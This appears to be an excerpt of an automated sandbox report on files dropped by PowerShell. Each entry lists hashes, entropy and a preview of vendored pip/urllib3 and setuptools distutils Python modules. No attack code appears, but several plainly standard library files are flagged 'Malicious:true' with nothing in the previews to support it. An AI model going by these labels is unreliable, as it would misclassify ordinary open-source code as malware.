                                                                                                                                                                                                                              SSDEEP:192:Xor+TN+l/uR6DlQ3KJ8MhCBvqGV7fQdF4sQiiqygT4l:4qTm/uwDGMyHpqJo
                                                                                                                                                                                                                              MD5:5889835D9129E4CF00C67622D51D610D
                                                                                                                                                                                                                              SHA1:D4949CAE8DC80A909047DE9E17A34AB11AF34ED5
                                                                                                                                                                                                                              SHA-256:B3577050FBA42F4FBE72B0B2B269B7BF325B5FDFB850674319370E5E0C1AF5A5
                                                                                                                                                                                                                              SHA-512:283D3A549F3DC8EA871B70C96FE1FB6899C0709D14C97A81211660A61206ADBDE0FA7FB99B60F7660B08B4526DB5542EFF3FCCD050A74335906F2EF54A69A770
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.'.............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.........Z...e.e.d.e.j...........................Z...G.d...d.e.........Z.y.)......)...absolute_importN)..._GLOBAL_DEFAULT_TIMEOUT..getdefaulttimeout.....)...TimeoutStateError..monotonicc..........................e.Z.d.Z.d.Z.e.Z.d.e.e.f.d...Z.d...Z.e.Z.e.d...........Z.e.d...........Z.e.d...........Z.d...Z.d...Z.d...Z.e.d...........Z.e.d...........Z.y.)...Timeouta2...Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. timeout = Timeout(connect=2.0, read=7.0). http = PoolManager(timeout=timeout). response = http.request('GET', 'http://example.com/').. Or per-request (which overrides the default for the pool):.. .. code-block:: python.. response = http.request('GET', 'http://example.com/', timeout=Timeout(10)).. Timeouts can be disabled by setting all the parameters to ``None``:.. .. code-block:: python..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15779
                                                                                                                                                                                                                              Entropy (8bit):5.728727419471604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:7jhVOVS1TU+lvP0EP2x2qMqXHJz/J9lZZJbrFwHjDP7l9pwDiGnCQZ1y1aPoa43a:PhVcS1A+82iXhnnZRrqfVweGCyZ7Z
                                                                                                                                                                                                                              MD5:E0B07137FE547A47A94720550A7FCACB
                                                                                                                                                                                                                              SHA1:986C05AA38541A66CEFC562E80C9FFC103449567
                                                                                                                                                                                                                              SHA-256:97C301833249EFA5749E0871C941D0F97DD086B04512AE420DB241B8AE39C1A0
                                                                                                                                                                                                                              SHA-512:E4D149F010CBC7893FE2D84BAE49AABFBAF7B6E100D552962B539243CB440E9AF7F76E7A892DDB2BD4CAC93CD284DA500C9D9B10FF216D2FCAD3687F03B0D5BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.7..............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.e.j...................e.j...................z...........Z.d.Z.d.Z.d.j'..................e.e...........Z.e.e.d...Z.g.d...Z.d.Z.d.d.j1..................e.D...c.g.c.]...}.|.e.z.........c.}.........z...d.z...Z.d.e.z...d.z...Z.d.e.z...d.z...e.z...d.z...Z.d.Z...e.j...................d.........Z...e.j...................d.e.z...d.z...........Z...e.j...................d.e.z...d.z...........Z...e.j...................d.e.z...d.z...........Z ..e.j...................d.e.d.d...z...d.z...........Z!..e.j...................d.e.z...d z...........Z"d!e...d.e...d.e...d"..Z#..e.j...................e#e.j...................e.j...................z...........Z$..e%d#........Z&..e%d$........Z'e&e'z...d%h.z...Z(e(d&d'h.z...Z)e)d(h.z...x.Z*Z+..G.d)..d*..e.d*e.................Z,d+..Z-d3d,..Z.d-..Z/d...Z0d/..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4387
                                                                                                                                                                                                                              Entropy (8bit):5.193309342221242
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:bzo0TiV8ZMXu9ohXMHqwhszBI/SmpT5cABuIAIPJth:40eiZMXG6XMHqwhUI/dT5ru6PJ
                                                                                                                                                                                                                              MD5:F2049EEA8A580A670ECE49DE78323167
                                                                                                                                                                                                                              SHA1:F427B70D79544FAE1444E6C70308000B57750081
                                                                                                                                                                                                                              SHA-256:E9AB36314A263350DF111B6F6EB5E9AF0DBAE40322AA0842C164232DA65CC62A
                                                                                                                                                                                                                              SHA-512:94EA6A2CE89428FA2999236B44C59F20377BDE7DB848564E7F14663A609F5F5F0794C7365845A6BEC430FC3490E39B5DB097FD3AA96B5EB7031998C7B4563D7A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z...g.d...Z...G.d...d.e.........Z.e.j...................d.k\..r.d...Z.n.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...a.d.d...Z.d.d...Z.y.#.e.$.r...d.d.l.m.Z...Y..Lw.x.Y.w.)......N)...partial)...monotonic)...time)...NoWayToWaitForSocketError..wait_for_read..wait_for_writec...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/util/wait.pyr....r........s.........r....r....)...........c.............................|.|.........S...Nr....)...fn..timeouts.... r......_retry_on_intrr....*...s..........'.{...r....c.....................".....|...t.........d.........}.n.t.................|.z...}.......|.|.........S.#.t.........t.........j...................f.$.rO}.|.j...................d.....t.........j...................k7..r...|.t.................z...}.|.d.k...r.d.}.|.t.........d.........k(..r.d.}.Y.d.}.~..md.}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4901
                                                                                                                                                                                                                              Entropy (8bit):4.618005268693608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:im6A4yu4N1QdNwwStdwcWTy1IPCSgR4omvom5BoQ/nQo:EquI6cqomvom3/Qo
                                                                                                                                                                                                                              MD5:3530B0109675511C483045517D150970
                                                                                                                                                                                                                              SHA1:4211CEC45876CD6CB663BF60BB1CE41582D5D098
                                                                                                                                                                                                                              SHA-256:E4BC760753D6DBD2B1067D93D3190DD420604416B780654904AA10A11A201159
                                                                                                                                                                                                                              SHA-512:3304AEC303CC96C2CC81EB99588AA07A35959BDF0055A816EA9A32DAF9EDDC596C19ED0D72F6C8FAB5ABD0A25171C06A3779A2753D9B50090574E5C3F7D3EE98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import socket..from ..contrib import _appengine_environ.from ..exceptions import LocationParseError.from ..packages import six.from .wait import NoWayToWaitForSocketError, wait_for_read...def is_connection_dropped(conn): # Platform-specific. """. Returns True if the connection is dropped and should be closed... :param conn:. :class:`http.client.HTTPConnection` object... Note: For platforms like AppEngine, this will always return ``False`` to. let the platform handle connection recycling transparently for us.. """. sock = getattr(conn, "sock", False). if sock is False: # Platform-specific: AppEngine. return False. if sock is None: # Connection already closed (such as by httplib).. return True. try:. # Returns True if readable, which here means it's been dropped. return wait_for_read(sock, timeout=0.0). except NoWayToWaitForSocketError: # Platform-specific: AppEngine. re
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1605
                                                                                                                                                                                                                              Entropy (8bit):4.495077395901519
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:FaHRE8L38awee8CfdO2MG89dWysSd2SIv/IBe:OHLMhB8DN1wSIEe
                                                                                                                                                                                                                              MD5:6823DF66EC0CB4E27629CFA1CDE0EBDC
                                                                                                                                                                                                                              SHA1:86F81687390427C86DA97B882DD7AD2B938275D3
                                                                                                                                                                                                                              SHA-256:CD4BCF3C226BA7A74E17437818055B39C97AA3EE2E5CA4AB1A24E492BE6F512E
                                                                                                                                                                                                                              SHA-512:D26CCD35B056700DB507BD2FD26ACAB4C3A170CB6C69A0EC6A64CAAF0392DFE3C4B94192460E75D083E6EE664E1915B0A2CC39F1D5AB8D114A37DF3D97E6FE36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .ssl_ import create_urllib3_context, resolve_cert_reqs, resolve_ssl_version...def connection_requires_http_tunnel(. proxy_url=None, proxy_config=None, destination_scheme=None.):. """. Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). """. # If we're not using a proxy, no way to use a tunnel.. if proxy_url is None:. return False.. # HTTP destinations never require tunneling, we always forward.. if destination_scheme == "http":. return False.. # Support for forwarding with HTTPS proxies and HTTPS destinations.. if (. proxy_url.scheme == "https". and proxy_config. and proxy_config.use_forwarding_for_https. ):. return False.. # Otherwise always use a t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):498
                                                                                                                                                                                                                              Entropy (8bit):4.477353837826609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:bxtt3eX2xS2l1sQNkwQOlxtf52B1FwznOwk5J2MbRl9Z5:btOE1kS521wzOj
                                                                                                                                                                                                                              MD5:716426931AFAD092EC0A85983BA6D094
                                                                                                                                                                                                                              SHA1:F768307325C0240B5C595BB79E618D87FE4016CB
                                                                                                                                                                                                                              SHA-256:9D1817F3F797FBF564BF1A17D3DE905A8CFC3ECD101D4004C482C263FECF9DC3
                                                                                                                                                                                                                              SHA-512:9D3EF19DA6ED7579964793BDCA023C88CA94A7209D095F1BE3305F85DFB3B83250DBD232BA0A72FD71CE5BE9A01C5AD7F58575ACBC1EC50660509FDBA4FA1917
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import collections..from ..packages import six.from ..packages.six.moves import queue..if six.PY2:. # Queue is imported for side effects on MS Windows. See issue #229.. import Queue as _unused_module_Queue # noqa: F401...class LifoQueue(queue.Queue):. def _init(self, _):. self.queue = collections.deque().. def _qsize(self, len=len):. return len(self.queue).. def _put(self, item):. self.queue.append(item).. def _get(self):. return self.queue.pop().
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3997
                                                                                                                                                                                                                              Entropy (8bit):4.7003873063352435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PeJqcpzxITTuYQa0ivYufSYzEE3g7wxQLGNotuE3ynoBUAn7Mi6dZvAxcW:WCTCYQ87fSJqSGNpENUAw/lu
                                                                                                                                                                                                                              MD5:AA68DA750C53499C3D188288615C1276
                                                                                                                                                                                                                              SHA1:DB735E5C86CA859B2AD760B5A06E73DB6DCD6330
                                                                                                                                                                                                                              SHA-256:0B4394B76B5C53A2D189027B61834FF46BCFAD2BE5EF388805E910FB99E50599
                                                                                                                                                                                                                              SHA-512:1DDFEA531509F486ED19BB2E0060A7EA63E5795CF3D788956A62AC83C9CC9AF375F4B8E400525B5C499AEF4E815F30954854F6F6B9F6BC4087986A7FA3CBEC89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..from base64 import b64encode..from ..exceptions import UnrewindableBodyError.from ..packages.six import b, integer_types..# Pass as a value within ``headers`` to skip.# emitting some HTTP headers that are added automatically..# The only headers that are supported are ``Accept-Encoding``,.# ``Host``, and ``User-Agent``..SKIP_HEADER = "@@@SKIP_HEADER@@@".SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])..ACCEPT_ENCODING = "gzip,deflate".._FAILEDTELL = object()...def make_headers(. keep_alive=None,. accept_encoding=None,. user_agent=None,. basic_auth=None,. proxy_basic_auth=None,. disable_cache=None,.):. """. Shortcuts for generating request headers... :param keep_alive:. If ``True``, adds 'connection: keep-alive' header... :param accept_encoding:. Can be a boolean, list, or string.. ``True`` translates to 'gzip,deflate'.. List will get joined by comma.. String w
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3510
                                                                                                                                                                                                                              Entropy (8bit):4.529413035203953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PYn1uZLY0GS9PpvNYKzamS7gkLgUCj0bp0FFN1SH8Qnt5JxWCkARhzE6nZwDQ1m8:uuK0HPpv1Nb5MGFU/JOChzB08
                                                                                                                                                                                                                              MD5:6EB83504356CF0A5778199247F39E6CA
                                                                                                                                                                                                                              SHA1:A3B6DD229AA3B2BE1A4148673A7A68D51EA53024
                                                                                                                                                                                                                              SHA-256:189A60DC4822F6A6895D1C01879C2FF8C36E4566A7E4122EE34A117A8C563F6F
                                                                                                                                                                                                                              SHA-512:E0B3F698B7AF3098526395E440CBAC30882EEFC5CDB9CAE0FAE166888B9C6546CC67176A1AEE50761E66FD6941A046645CA714A28E4CA09D75569C85A58ED2AB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect..from ..exceptions import HeaderParsingError.from ..packages.six.moves import http_client as httplib...def is_fp_closed(obj):. """. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. """.. try:. # Check `isclosed()` first, in case Python3 doesn't set `closed`.. # GH Issue #928. return obj.isclosed(). except AttributeError:. pass.. try:. # Check via the official file-like-object way.. return obj.closed. except AttributeError:. pass.. try:. # Check if the object is a container for another file-like object that. # gets released on exhaustion (e.g. HTTPResponse).. return obj.fp is None. except AttributeError:. pass.. raise ValueError("Unable to determine whether fp is closed.")...def assert_header_parsi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14296
                                                                                                                                                                                                                              Entropy (8bit):4.9149976609001556
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:jGBaWLWmblAkuqSHMXN5ts+RsF6IZQOaweGqSxgOO12j:jGruLHMPWV6a6pSxgVc
                                                                                                                                                                                                                              MD5:3B0F140E69E68B5AA6006E4C7621E365
                                                                                                                                                                                                                              SHA1:23D4363BF76691302DC9E216A3E4AD6DEE839CDB
                                                                                                                                                                                                                              SHA-256:942004ECCE66C80F040DD5B4B09BB2C9985507D2BF8F7F258D684702715A5A81
                                                                                                                                                                                                                              SHA-512:190637764FCB3AC705D942D992886652F98D9103DA4962D7A0D83AC0BADE9EF4DCD2D8E18E559EA6F21B23C46034E6D72B2488ADCB8F282828DC0DD8CFA75765
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import re.from collections import namedtuple..from ..exceptions import LocationParseError.from ..packages import six..url_attrs = ["scheme", "auth", "host", "port", "path", "query", "fragment"]..# We only want to normalize urls with an HTTP(S) scheme..# urllib3 infers URLs without a scheme (None) to be http..NORMALIZABLE_SCHEMES = ("http", "https", None)..# Almost all of these patterns were derived from the.# 'rfc3986' module: https://github.com/python-hyper/rfc3986.PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}").SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)").URI_RE = re.compile(. r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?". r"(?://([^\\/?#]*))?". r"([^?#]*)". r"(?:\?([^#]*))?". r"(?:#(.*))?$",. re.UNICODE | re.DOTALL,.)..IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}".HEX_PAT = "[0-9A-Fa-f]{1,4}".LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=HEX_PAT, ipv4=IPV4_PAT)._subs = {"hex": HEX_PAT, "ls32": LS32_PAT}._variations = [. #
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5403
                                                                                                                                                                                                                              Entropy (8bit):4.537602348461433
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Y2n0jQGAov2Rq9rFKYuBArDu8N1lwcycJR8c8WR9qgP8LjBGdisassAEgaYAEDn:YE0jQGf9hKorDu4ec86T0LjBxsad2D
                                                                                                                                                                                                                              MD5:CF3F909036467C64F0829344E4C49904
                                                                                                                                                                                                                              SHA1:7944D9BDA2E8389C5CEBA58A7AD704532A4F6DD2
                                                                                                                                                                                                                              SHA-256:7CE5F4FDF6A8CC6D8FEE25688D0A04D666F277078DC93726FA15C47C5AD3B4B2
                                                                                                                                                                                                                              SHA-512:8362891953CDA4B2FC8072880D8BC3F9403FB9DFE6A86C0BB017C9E1CF8A4DD0A7B32172ACFCC92D236C38610A0851C32802B6AAA0CB4F6E35354074EB8ED195
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import errno.import select.import sys.from functools import partial..try:. from time import monotonic.except ImportError:. from time import time as monotonic..__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"]...class NoWayToWaitForSocketError(Exception):. pass...# How should we wait on sockets?.#.# There are two types of APIs you can use for waiting on sockets: the fancy.# modern stateful APIs like epoll/kqueue, and the older stateless APIs like.# select/poll. The stateful APIs are more efficient when you have a lots of.# sockets to keep track of, because you can set them up once and then use them.# lots of times. But we only ever want to wait on a single socket at a time.# and don't want to keep track of state, so the stateless APIs are actually.# more efficient. So we want to use select() or poll()..#.# Now, how do we choose between select() and poll()? On traditional Unixes,.# select() has a strange calling convention that makes it slow, or fail.# a
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):567
                                                                                                                                                                                                                              Entropy (8bit):4.093079025739401
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:kyNUtkbzQm6FA9HY9ptAjqk99I9Wptkk9etAjq19D1:kEUItYkpS3
                                                                                                                                                                                                                              MD5:67464558C4B112BEA6440AC2D550759C
                                                                                                                                                                                                                              SHA1:1685CE0663338D543D7737BEE3D04403D689AEDF
                                                                                                                                                                                                                              SHA-256:DA181EF7F1772E2BD6E11E29B45AAC1B9B1BE96AEC41CF55DF4970316BFCEA18
                                                                                                                                                                                                                              SHA-512:F3573A8BF6FEFF9A861AD07FF1CB7070D6FE624A239198E45EAE1DF642F214B43D86089B4F073BA70916A681AB9E69F9957E2CE81F3DF4D24F6A6E4E31AE536B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import sys..if sys.version_info < (3, 9):.. def removesuffix(self, suffix):. # suffix='' should not call self[:-0].. if suffix and self.endswith(suffix):. return self[: -len(suffix)]. else:. return self[:].. def removeprefix(self, prefix):. if self.startswith(prefix):. return self[len(prefix) :]. else:. return self[:].else:.. def removesuffix(self, suffix):. return self.removesuffix(suffix).. def removeprefix(self, prefix):. return self.removeprefix(prefix).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5226
                                                                                                                                                                                                                              Entropy (8bit):4.289692547325918
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UNHetW1+zO2QP73AB98GjwQEkI2YNFjk28966tS8ZjocgOL:UFetS+1QD098+FFI2YNFjk289xI8Zj9L
                                                                                                                                                                                                                              MD5:1927EF723D161ACF3247B7CF045359FA
                                                                                                                                                                                                                              SHA1:59F4ED1504F6BCB8E76429264FED922B90B2997A
                                                                                                                                                                                                                              SHA-256:70274BEC101ABDD87FDAD0D6D04669D6BA35BD37968456732D73753FA1C097A5
                                                                                                                                                                                                                              SHA-512:E3685A7070671C46762EB46D29AF1DABECB660CB79B0DED8A6005C403F8517B7058C32D670A56F4F639C6EA62D9583D172DCB5EC74DDF90F1AAFD01D0C019A1D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.pypirc..Provides the PyPIRCCommand class, the base class for the command classes.that uses .pypirc in the distutils.command package.."""..import email.message.import os.from configparser import RawConfigParser..from .cmd import Command..DEFAULT_PYPIRC = """\.[distutils].index-servers =. pypi..[pypi].username:%s.password:%s."""...class PyPIRCCommand(Command):. """Base command that knows how to handle the .pypirc file""".. DEFAULT_REPOSITORY = 'https://upload.pypi.org/legacy/'. DEFAULT_REALM = 'pypi'. repository = None. realm = None.. user_options = [. ('repository=', 'r', "url of repository [default: %s]" % DEFAULT_REPOSITORY),. ('show-response', None, 'display full response text from server'),. ].. boolean_options = ['show-response'].. def _get_rc_file(self):. """Returns rc file path.""". return os.path.join(os.path.expanduser('~'), '.pypirc').. def _store_pypirc(self, username, password):. """Creates a de
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9372
                                                                                                                                                                                                                              Entropy (8bit):4.554758613946955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mrNst8LM8b4hvpwI35XvxzjzLI5WkVl5rT6lPjy7SBlYO/p/rfeJNIRYp:mrNU8Aus5X5zjfkVl92lLEOqKO
                                                                                                                                                                                                                              MD5:F478A0C7E0C4D9D48D684E47D3584211
                                                                                                                                                                                                                              SHA1:386B909D8F1CA7DE2C7B478DB5EFD4F00BF3A0AF
                                                                                                                                                                                                                              SHA-256:58F66BADFDA66CCF553E0E28FE38C044F5602F340D61DFDAB4C4DF36BD8FD6F2
                                                                                                                                                                                                                              SHA-512:AF8A70DEB32AD8384B502BE28725AAD193368DA6D218601D40A2A0169A4483FADE8C939B85E7376488F717C4528DECC614ECD05FDD0327F019AB8B0C103B668A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.core..The only module that needs to be imported to use the Distutils; provides.the 'setup' function (which is to be called from the setup script). Also.indirectly provides the Distribution and Command classes, although they are.really defined in distutils.dist and distutils.cmd.."""..import os.import sys.import tokenize..from .cmd import Command.from .config import PyPIRCCommand.from .debug import DEBUG..# Mainly import these so setup scripts can "from distutils.core import" them..from .dist import Distribution.from .errors import (. CCompilerError,. DistutilsArgError,. DistutilsError,. DistutilsSetupError,.).from .extension import Extension..__all__ = ['Distribution', 'Command', 'PyPIRCCommand', 'Extension', 'setup']..# This is a barebones help message generated displayed when the user.# runs the setup script with no arguments at all. More useful help.# is generated with various --help options: global help, list commands,.# and per-command help..USAGE = """\
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11945
                                                                                                                                                                                                                              Entropy (8bit):4.685562399060225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Uv5HDccze7cah+fnMm3RUQmrqoDQm12wEU5jdeMTVNZ2etY7L0h3tOIlZnt99Fs:Cjcz7dhlq1mrqoD/1ZE6jdeYMuU0BllU
                                                                                                                                                                                                                              MD5:D81AA5D519061A5803DDDEEF59B88CE7
                                                                                                                                                                                                                              SHA1:207BD634CA5BF2426D73918A0310AFB49B7E2EFA
                                                                                                                                                                                                                              SHA-256:4813FEDDC00C5E99604E862675E621EAB88ADC9320AD93CD6BD76A3AA282899D
                                                                                                                                                                                                                              SHA-512:6993B7A8310FC961F86BA9F2BCDC3F624ADF812AB9D91C1FB2D2DA28477099968BF9B4462DED2859203C14CFE2927EDC625B78CE2B4C320A204CED4B46D79199
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.cygwinccompiler..Provides the CygwinCCompiler class, a subclass of UnixCCompiler that.handles the Cygwin port of the GNU C compiler to Windows. It also contains.the Mingw32CCompiler class which handles the mingw32 port of GCC (same as.cygwin in no-cygwin mode).."""..import copy.import os.import pathlib.import re.import shlex.import sys.import warnings.from subprocess import check_output..from ._collections import RangeMap.from .errors import (. CCompilerError,. CompileError,. DistutilsExecError,. DistutilsPlatformError,.).from .file_util import write_file.from .unixccompiler import UnixCCompiler.from .version import LooseVersion, suppress_known_deprecation.._msvcr_lookup = RangeMap.left(. {. # MSVC 7.0. 1300: ['msvcr70'],. # MSVC 7.1. 1310: ['msvcr71'],. # VS2005 / MSVC 8.0. 1400: ['msvcr80'],. # VS2008 / MSVC 9.0. 1500: ['msvcr90'],. # VS2010 / MSVC 10.0. 1600: ['msvcr100'],. # VS
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):139
                                                                                                                                                                                                                              Entropy (8bit):4.871969431047891
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSxPDbsQhgXFuLc1FKRpxRIVRjSA07A1xpnV6SWhGOhgXCu:a80gVuTR5IVQFKfV6Zgn
                                                                                                                                                                                                                              MD5:BC1E4C71305DFBEEBA03CD8E4E56E931
                                                                                                                                                                                                                              SHA1:366246D9AB8F12833B1B2765FADE51BB635D49CA
                                                                                                                                                                                                                              SHA-256:37A32B4C0A8AEA5F52564EAD5B0791D74F0F33C3A5EEA3657F257E9C770B86C6
                                                                                                                                                                                                                              SHA-512:876D9D1FA517468B7D84C7E4464916CBC50F923E764FAA274CCD2E6F2B8E3D350A7B2A3E57C26AC287E83119A7CDDCD3EF11FFB1EC2B513B3F899373248FCB36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import os..# If DISTUTILS_DEBUG is anything other than the empty string, we run in.# debug mode..DEBUG = os.environ.get('DISTUTILS_DEBUG').
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):349
                                                                                                                                                                                                                              Entropy (8bit):4.406386931094089
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:wXLovzF6tjeDq9RrdfF21hx/XdLSzmQ+cwHahpllomJV75LNH1YilS715EfQpvb:wXQEtLRr1F21hJXdL8m9GlBLNHqiw5Em
                                                                                                                                                                                                                              MD5:9B1DA32576B5B77495CD2D949EE95BEB
                                                                                                                                                                                                                              SHA1:43B455F34C55D6F18A4B066733E2AEFFB0DB045C
                                                                                                                                                                                                                              SHA-256:C4DEF9A7A6691E13221C473EAE92F65E29494329C79C336269F1ED79A678B635
                                                                                                                                                                                                                              SHA-512:9EAF17D98CC984CF1C9EB99F5A7040800F9A25E2E5019C090288708EF059917902EF6FC57BED3B21138C9B635CA451C242A7E8302B76454042470591268C4A0A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import warnings..from . import _modified...def __getattr__(name):. if name not in ['newer', 'newer_group', 'newer_pairwise']:. raise AttributeError(name). warnings.warn(. "dep_util is Deprecated. Use functions from setuptools instead.",. DeprecationWarning,. stacklevel=2,. ). return getattr(_modified, name).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7965
                                                                                                                                                                                                                              Entropy (8bit):4.389527851905315
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UNu0e4nCoVfsNzLoBJmIJD1SQ9v6Vkvk1pNi7K6Rw5eQ8wuFQRzuRoFpxwjam/XA:knKLshSaCVtCK6Rw5wlQJRxUam/sv
                                                                                                                                                                                                                              MD5:8098AB4B9FB7E379205CD736388C641C
                                                                                                                                                                                                                              SHA1:600A7B17AB36EF0912C0E2FFE20537285256874A
                                                                                                                                                                                                                              SHA-256:68EF7930B0EADBF070ECF221781F887A8605DB173DC9FA3E08C9498363A5C106
